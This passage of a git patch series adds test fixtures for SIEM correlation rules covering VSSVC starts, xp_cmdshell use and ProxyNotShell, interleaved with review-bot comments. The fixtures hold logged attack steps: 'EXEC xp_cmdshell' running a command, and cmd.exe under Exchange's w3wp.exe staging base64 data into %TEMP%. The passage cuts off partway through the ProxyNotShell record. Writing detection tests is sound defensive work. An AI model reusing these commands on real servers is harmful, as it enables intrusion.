@@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4688\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"13312\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T08:46:55.3231989Z\"},\"EventRecordID\":\"26381023\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"10216\"},\"Channel\":\"Security\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-18\"},{\"Name\":\"SubjectUserName\",\"text\":\"WIN10-WORK$\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x3e7\"},{\"Name\":\"NewProcessId\",\"text\":\"0xa08\"},{\"Name\":\"NewProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\VSSVC.exe\"},{\"Name\":\"TokenElevationType\",\"text\":\"%%1936\"},{\"Name\":\"ProcessId\",\"text\":\"0x344\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\vssvc.exe\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-0-0\"},{\"Name\":\"TargetUserName\",\"text\":\"-\"},{\"Name\":\"TargetDomainName\",\"text\":\"-\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x0\"},{\"Name\":\"ParentProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"MandatoryLabel\",\"text\":\"S-1-16-16384\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": 
"PT_Microsoft_Windows_eventlog_4688_A_new_process_has_been_created", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4688", "normalized": true, "object": "process", "object.account.domain": "stand2008", "object.account.id": "S-1-5-18", "object.account.name": "win10-work$", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\vssvc.exe", "object.process.fullpath": "c:\\windows\\system32\\vssvc.exe", "object.process.id": "2568", "object.process.name": "vssvc.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.id": "836", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T09:03:36.660Z", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-18", "subject.account.name": "win10-work$", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999", "subject.state": "on behalf of oneself", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-05T08:46:55.323Z", "type": "raw", "uuid": "6606c632-5844-40bf-96ca-f5749582324b"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Services: Service Execution", "correlation_name": "VSSVC_service_state_changed", "correlation_type": "event", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "VSSVC_service_state_changed|win10-work.stand2008.local", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "service", "object.account.domain": "stand2008", "object.account.id": "S-1-5-18", "object.account.name": "win10-work$", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\vssvc.exe", "object.process.fullpath": "c:\\windows\\system32\\vssvc.exe", "object.process.id": "2568", "object.process.name": "vssvc.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.id": "836", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "reason": "|Service execution", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-18", "subject.account.name": "win10-work$", "subject.account.privileges": "TokenElevationTypeDefault", "subject.account.session_id": "999"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_2.sc new file mode 100644 index 00000000..2109aef9 --- /dev/null 
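Review bot: The scaffold placeholder comment `# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь` was committed unchanged on the comment line of this hunk, so the file's only comment says nothing about the case; the same placeholder is left in the test_2.sc hunk below and in XP_Cmdshell_Usage/tests/test_1.sc in the following patch. Replace it with a line that states what the fixture is and why the rule should fire, e.g. `# Security 4688: VSSVC.exe started by services.exe as SYSTEM (S-1-5-18, logon 0x3e7); the rule should emit exactly one VSSVC_service_state_changed event`. Both VSSVC fixtures are positive cases only; if the `expect` directive accepts a count of 0, a third scenario with a process start that should not match would guard against the rule matching more broadly than intended, though the rule body itself is not visible here. The file also lacks a trailing newline (`\ No newline at end of file`), which will surface as noise in the next diff that touches it.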
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/VSSVC_service_state_changed/tests/test_2.sc 
@@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T08:46:55.3985456Z\"},\"EventRecordID\":\"46944136\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3448\",\"ThreadID\":\"4816\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"-\"},{\"Name\":\"UtcTime\",\"text\":\"2023-06-05 08:46:55.323\"},{\"Name\":\"ProcessGuid\",\"text\":\"{2b856446-a0ff-647d-4503-00000000ba00}\"},{\"Name\":\"ProcessId\",\"text\":\"2568\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\VSSVC.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.19041.1741 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Microsoft® Volume Shadow Copy Service\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"VSSVC.EXE\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\vssvc.exe\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\СИСТЕМА\"},{\"Name\":\"LogonGuid\",\"text\":\"{2b856446-79f9-647d-e703-000000000000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"MD5=875046AD4755396636A68F4A9EDB22A4,SHA256=82459B7D6CEEFF22E6E81CA445F9134C3EE917BDC3DF185700813F23AC7DB77E,IMPHASH=0BF1B64AF19D0AFACCB000F015F48095\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{2b856446-79f8-647d-0b00-00000000ba00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"},{\"Name\":\"ParentUser\",\"text\":\"NT AUTHORITY\\\\СИСТЕМА\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "2b856446-79f9-647d-e703-000000000000", "event_src.category": "Other", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:система@nt authority", "object.account.name": "система", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\vssvc.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\vssvc.exe", "object.process.guid": "2b856446-a0ff-647d-4503-00000000ba00", 
"object.process.hash.imphash": "0BF1B64AF19D0AFACCB000F015F48095", "object.process.hash.md5": "875046AD4755396636A68F4A9EDB22A4", "object.process.hash.sha256": "82459B7D6CEEFF22E6E81CA445F9134C3EE917BDC3DF185700813F23AC7DB77E", "object.process.id": "2568", "object.process.meta": "Description:Microsoft® Volume Shadow Copy Service | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "vssvc.exe", "object.process.original_name": "VSSVC.EXE", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "2b856446-79f8-647d-0b00-00000000ba00", "object.process.parent.id": "836", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.19041.1741 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T09:52:59.463Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:система@nt authority", "subject.account.name": "система", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-05T08:46:55.323Z", "type": "raw", "uuid": "c26f2f41-0876-4ccc-87b1-367e5ffe3843"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Execution", "category.low": "System Services: Service Execution", "correlation_name": "VSSVC_service_state_changed", "correlation_type": "event", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "VSSVC_service_state_changed|win10-work.stand2008.local", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "service", "object.account.domain": "nt authority", "object.account.id": "synthetic:система@nt authority", "object.account.name": "система", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\vssvc.exe", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\vssvc.exe", "object.process.guid": "2b856446-a0ff-647d-4503-00000000ba00", "object.process.hash.md5": "875046AD4755396636A68F4A9EDB22A4", "object.process.hash.sha256": "82459B7D6CEEFF22E6E81CA445F9134C3EE917BDC3DF185700813F23AC7DB77E", "object.process.id": "2568", "object.process.meta": "Description:Microsoft® Volume Shadow Copy Service | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "vssvc.exe", "object.process.original_name": "VSSVC.EXE", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "2b856446-79f8-647d-0b00-00000000ba00", "object.process.parent.id": "836", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": 
"c:\\windows\\system32\\", "object.process.version": "10.0.19041.1741 (WinBuild.160101.0800)", "reason": "|Service execution", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:система@nt authority", "subject.account.name": "система", "subject.account.privileges": "System", "subject.account.session_id": "999"} \ No newline at end of file From efa885f808b9d2d802bc4126b85949dd9bb47429 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 10:53:57 +0300 Subject: [PATCH 36/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20=D0=BF?= =?UTF-8?q?=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(XP=5FCmdshell=5FUsage)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_execution/XP_Cmdshell_Usage/tests/test_1.sc | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_execution/XP_Cmdshell_Usage/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_execution/XP_Cmdshell_Usage/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_execution/XP_Cmdshell_Usage/tests/test_1.sc new file mode 100644 index 00000000..43da6603 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_execution/XP_Cmdshell_Usage/tests/test_1.sc 
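Review bot: The Sysmon fixture in this hunk carries a localized account name (`NT AUTHORITY\\СИСТЕМА`, normalized to `"subject.account.name": "система"`) and the expect block depends on that value, but nothing records that this is deliberate. A one-line comment such as `# Sysmon 1 from a Russian-locale host: the SYSTEM account is reported as СИСТЕМА, so the rule must not depend on the English account name` would stop a later cleanup from "correcting" the value to SYSTEM and silently narrowing what the test proves. Whether the rule keys on the account name at all cannot be seen from the hunk, so the comment should be checked against the rule body before it is added.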
@@ -0,0 +1,4 @@ +{"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"MSSQLSERVER\"},\"EventID\":{\"text\":\"33205\",\"Qualifiers\":\"16384\"},\"Level\":\"0\",\"Task\":\"5\",\"Keywords\":\"0xa0000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-01-31T14:18:25.292649100Z\"},\"EventRecordID\":\"1894\",\"Channel\":\"Application\",\"Computer\":\"DESKTOP-GB13G7P\",\"Security\":null},\"EventData\":{\"Data\":\"audit_schema_version:1\\nevent_time:2020-01-31 14:18:24.2931884\\nsequence_number:1\\naction_id:EX \\nsucceeded:true\\nis_column_permission:false\\nsession_id:57\\nserver_principal_id:268\\ndatabase_principal_id:1\\ntarget_server_principal_id:0\\ntarget_database_principal_id:0\\nobject_id:-1008137134\\nuser_defined_event_id:0\\ntransaction_id:54619\\nclass_type:X \\npermission_bitmask:00000000000000000000000000000020\\nsequence_group_id:855307DD-33F9-4781-BC23-94C72CCD8460\\nsession_server_principal_name:Analysis\\nserver_principal_name:Analysis\\nserver_principal_sid:5c9dc62711b2c84695fc5132e3a852db\\ndatabase_principal_name:dbo\\ntarget_server_principal_name:\\ntarget_server_principal_sid:\\ntarget_database_principal_name:\\nserver_instance_name:DESKTOP-GB13G7P\\ndatabase_name:master\\nschema_name:sys\\nobject_name:xp_cmdshell\\nstatement:EXEC xp_cmdshell 'ipconfig'\\nadditional_information:\\nuser_defined_information:\\n\"}}}", "datafield1": "EXEC xp_cmdshell 'ipconfig'", "datafield2": "DESKTOP-GB13G7P", "datafield3": "master", "datafield4": "EX", "datafield5": "X", "datafield8": "ipconfig", "event_src.category": "Database server", "event_src.fqdn": "desktop-gb13g7p", "event_src.host": "desktop-gb13g7p", "event_src.hostname": "desktop-gb13g7p", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": 
"PT_Microsoft_SQL_Server_eventlog_33205_audit_exec_used", "importance": "high", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "33205", "normalized": true, "object": "command", "object.property": "command name", "object.query": "EXEC xp_cmdshell 'ipconfig'", "object.type": "commandline payload", "object.value": "xp_cmdshell", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T12:18:11.012Z", "status": "success", "subject": "account", "subject.account.id": "5c9dc62711b2c84695fc5132e3a852db", "subject.account.name": "analysis", "subject.id": "5c9dc62711b2c84695fc5132e3a852db", "subject.name": "analysis", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-01-31T14:18:24.293Z", "type": "raw", "uuid": "558a6586-c704-44f4-a03e-e4cdb5321652"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "execute", "alert.context": "ipconfig", "alert.key": "EXEC xp_cmdshell 'ipconfig'", "category.generic": "Attack", "category.high": "Execution", "category.low": "Command-Line Interface", "correlation_name": "XP_Cmdshell_Usage", "correlation_type": "event", "datafield1": "EXEC xp_cmdshell 'ipconfig'", "datafield2": "DESKTOP-GB13G7P", "datafield3": "master", "datafield4": "EX", "datafield5": "X", "datafield8": "ipconfig", "event_src.category": "Database server", "event_src.fqdn": "desktop-gb13g7p", "event_src.host": "desktop-gb13g7p", "event_src.hostname": "desktop-gb13g7p", "event_src.subsys": "Application", "event_src.title": "sql_server", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "XP_Cmdshell_Usage|desktop-gb13g7p|5c9dc62711b2c84695fc5132e3a852db", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "command", "object.property": "command name", "object.query": "EXEC xp_cmdshell 'ipconfig'", 
"object.type": "commandline payload", "object.value": "xp_cmdshell", "status": "success", "subject": "account", "subject.account.id": "5c9dc62711b2c84695fc5132e3a852db", "subject.account.name": "analysis"} From a0b9b20acf18175fdf192ca8c6141eeab977de1f Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 11:12:09 +0300 Subject: [PATCH 37/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(ProxyNot?= =?UTF-8?q?Shell:)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../ProxyNotShell/tests/test_1.sc | 6 ++++++ .../ProxyNotShell/tests/test_2.sc | 6 ++++++ 2 files changed, 12 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_1.sc new file mode 100644 index 00000000..9085fcdb --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_initial_access/ProxyNotShell/tests/test_1.sc 
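Review bot: The single fixture exercises `"object.value": "xp_cmdshell"` and `"object.query": "EXEC xp_cmdshell 'ipconfig'"` only in lowercase, so the test does not establish whether the rule's match is case-insensitive; T-SQL object names are usually compared under a case-insensitive collation, so a second fixture with the procedure name in mixed case and `expect 1` would pin that behavior if it is intended. Whether the normalizer already lowercases `object.value` before the rule sees it is not visible from this hunk, so the expected count for such a fixture should be confirmed against the rule body. The expect block also asserts `"alert.context": "ipconfig"` and `"alert.key": "EXEC xp_cmdshell 'ipconfig'"`, which is worth a short comment naming the source fields they are derived from (`datafield8` and `datafield1` in the input) so the mapping is obvious to the next reader.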
@@ -0,0 +1,6 @@ +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"2\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-03-29T12:26:10.023279300Z\"},\"EventRecordID\":\"8695760\",\"Correlation\":{\"ActivityID\":\"{4f904282-5ce1-0000-b842-904fe15cd901}\"},\"Execution\":{\"ProcessID\":\"620\",\"ThreadID\":\"19016\"},\"Channel\":\"Security\",\"Computer\":\"exchange.example.com\",\"Security\":null},\"EventData\":{\"Data\":[{\"text\":\"S-1-0-0\",\"Name\":\"SubjectUserSid\"},{\"text\":\"-\",\"Name\":\"SubjectUserName\"},{\"text\":\"-\",\"Name\":\"SubjectDomainName\"},{\"text\":\"0x0\",\"Name\":\"SubjectLogonId\"},{\"text\":\"S-1-5-21-1999687082-732736654-454791560-1114\",\"Name\":\"TargetUserSid\"},{\"text\":\"k_ivanov\",\"Name\":\"TargetUserName\"},{\"text\":\"example\",\"Name\":\"TargetDomainName\"},{\"text\":\"0x34ac298b\",\"Name\":\"TargetLogonId\"},{\"text\":\"3\",\"Name\":\"LogonType\"},{\"text\":\"NtLmSsp \",\"Name\":\"LogonProcessName\"},{\"text\":\"NTLM\",\"Name\":\"AuthenticationPackageName\"},{\"text\":\"rhangnsivabVi\",\"Name\":\"WorkstationName\"},{\"text\":\"{00000000-0000-0000-0000-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"-\",\"Name\":\"TransmittedServices\"},{\"text\":\"NTLM 
V2\",\"Name\":\"LmPackageName\"},{\"text\":\"128\",\"Name\":\"KeyLength\"},{\"text\":\"0x0\",\"Name\":\"ProcessId\"},{\"text\":\"-\",\"Name\":\"ProcessName\"},{\"text\":\"10.155.1.6\",\"Name\":\"IpAddress\"},{\"text\":\"45342\",\"Name\":\"IpPort\"},{\"text\":\"%%1833\",\"Name\":\"ImpersonationLevel\"},{\"text\":\"-\",\"Name\":\"RestrictedAdminMode\"},{\"text\":\"-\",\"Name\":\"TargetOutboundUserName\"},{\"text\":\"-\",\"Name\":\"TargetOutboundDomainName\"},{\"text\":\"%%1843\",\"Name\":\"VirtualAccount\"},{\"text\":\"0x0\",\"Name\":\"TargetLinkedLogonId\"},{\"text\":\"%%1843\",\"Name\":\"ElevatedToken\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "chain_id": "4f904282-5ce1-0000-b842-904fe15cd901", "datafield6": "Network", "datafield9": "NTLM", "dst.fqdn": "exchange.example.com", "dst.host": "exchange.example.com", "dst.hostname": "exchange", "event_src.category": "AAA", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "NtLmSsp", "logon_type": 3, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "system", "object.property": "session ID with ElevatedToken", "object.value": "0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-04-03T09:59:22.529Z", "src.host": "rhangnsivabvi", "src.hostname": "rhangnsivabvi", "src.ip": "10.155.1.6", "src.port": 45342, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1999687082-732736654-454791560-1114", "subject.account.name": "k_ivanov", 
"subject.account.privileges": "local user rights", "subject.account.session_id": "883698059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-03-29T12:26:10.023Z", "type": "raw", "uuid": "093da62a-7657-4bf6-8ae1-bec6f1e0b7a8"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-03-29T12:26:08.950218800Z\"},\"EventRecordID\":\"6959898\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3184\",\"ThreadID\":\"4760\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"exchange.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-03-29 12:26:08.946\",\"Name\":\"UtcTime\"},{\"text\":\"{d5e182b9-2e60-6424-c625-000000002700}\",\"Name\":\"ProcessGuid\"},{\"text\":\"2276\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Name\":\"Image\"},{\"text\":\"10.0.17763.1697 (WinBuild.160101.0800)\",\"Name\":\"FileVersion\"},{\"text\":\"Windows Command Processor\",\"Name\":\"Description\"},{\"text\":\"Microsoft® Windows® Operating System\",\"Name\":\"Product\"},{\"text\":\"Microsoft Corporation\",\"Name\":\"Company\"},{\"text\":\"Cmd.Exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /c echo 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>>%%TEMP%%\\\\RsJnf.b64\",\"Name\":\"CommandLine\"},{\"text\":\"c:\\\\windows\\\\system32\\\\inetsrv\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"NT 
AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"},{\"text\":\"{d5e182b9-36b7-641b-e703-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0x3e7\",\"Name\":\"LogonId\"},{\"text\":\"0\",\"Name\":\"TerminalSessionId\"},{\"text\":\"System\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18\",\"Name\":\"Hashes\"},{\"text\":\"{d5e182b9-3724-641b-d100-000000002700}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"10384\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\"Name\":\"ParentImage\"},{\"text\":\"c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe -ap \\\"MSExchangePowerShellAppPool\\\" -v \\\"v4.0\\\" -c \\\"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\bin\\\\GenericAppPoolConfigWithGCServerEnabledFalse.config\\\" -a \\\\\\\\.\\\\pipe\\\\iisipm6ed2a926-10ba-4360-834b-895310382a0a -h \\\"C:\\\\inetpub\\\\temp\\\\apppools\\\\MSExchangePowerShellAppPool\\\\MSExchangePowerShellAppPool.config\\\" -w \\\"\\\" -m 0\",\"Name\":\"ParentCommandLine\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "d5e182b9-36b7-641b-e703-000000000000", "event_src.category": "Other", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", 
